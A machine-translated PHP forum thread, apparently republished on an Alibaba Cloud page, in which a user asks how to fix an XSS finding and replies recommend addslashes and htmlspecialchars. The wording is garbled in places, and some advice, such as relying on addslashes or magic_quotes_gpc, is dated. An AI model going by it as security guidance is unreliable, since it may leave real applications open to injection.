The system has a severe vulnerability. how to filter user input metadata?
Source: Internet
Author: User
The system has severe vulnerabilities. how to filter user input metadata when I detect a website: The system has a severe vulnerability. Vulnerability level: High-risk threat type: CrossSiteScripting may cause: malicious users can exploit vulnerabilities in JavaScript, VBScript, ActiveX, HTML, and even Flash to obtain information about other users. Attackers can exploit this vulnerability to filter user input metadata.
When I checked my website:
The system has severe vulnerabilities,
Vulnerability level: High risk
Threat type: Cross Site Scripting
Possible cause: malicious users can exploit vulnerabilities in JavaScript, VBScript, ActiveX, HTML, and even Flash to obtain other user information. Attackers can steal session cookies, obtain accounts, simulate identities of other users, and even modify the content that the webpage presents to other users.
Description: This page is vulnerable to XSS attacks.
Cross-site scripting (XSS) is generally described in Javascript, which allows attackers to send malicious code to another user. Because the browser cannot identify whether the script is credible, the cross-site vulnerability script runs and allows attackers to obtain cookies or sessions of other users.
Suggestion: We recommend that you filter user input metadata.
What does that mean? Who knows how to filter?
------ Solution --------------------
Addslashes escapes incoming data to prevent SQL attacks .. If magic_quotes_gpc is on, you do not need to escape it again in the program,
Htmlspecialchars can be used for data output... For example, user comments, you cannot determine what the user has submitted, such as the vulnerability you mentioned above.
In this case, htmlspecialchars is required for the data output to the page.
------ Solution --------------------
. Addslashes ($ _ POST ['username'])
Sometimes you need $ str or $ id to determine the type.
Poor judgment. even if you use addslashes to set up another htmlspecialchars, it will be infiltrated.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.